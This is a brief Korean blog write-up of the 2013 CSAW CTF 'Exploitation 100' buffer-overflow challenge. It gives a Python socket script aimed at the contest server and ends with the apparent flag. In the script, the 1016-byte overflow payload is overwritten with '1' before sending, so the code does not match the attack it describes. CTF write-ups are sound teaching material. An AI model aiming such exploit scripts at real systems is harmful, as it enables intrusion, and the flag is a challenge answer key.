상세 컨텐츠

본문 제목

2013 CSAW CTF Exploitation 100 [exploit]

0x10 정보보안/0x13 Write-Up

by sweetchip 2013. 9. 23. 22:47

본문

반응형




csaw대회에서 비교적 쉬운 포너블 문제로 생애 처음으로 ctf중에 리모트 쉘을 따는것을 성공했다.


아 물론 이 문제는 아니지만.. ㅎㅎ


한줄요약 : Simple Buffer Overflow



exploit1



Aslr : Off (fork())

NX : Off (execstack : X)


from Tkinter import Tk

from socket import *

import time


HOST = "128.238.66.212"

PORT = 31337


a = "A"*1016

a = '1'


print "[*] Sending Exploit Codes.."


s = socket(AF_INET,SOCK_STREAM)

s.connect((HOST,PORT))

s.recv(12070)

time.sleep(0.4)

s.send(a)

time.sleep(0.4)

print s.recv(12070)


raw_input("\nok?")


#{7c1fbb502632bffa6e62ba6fa847681f}


반응형

관련글 더보기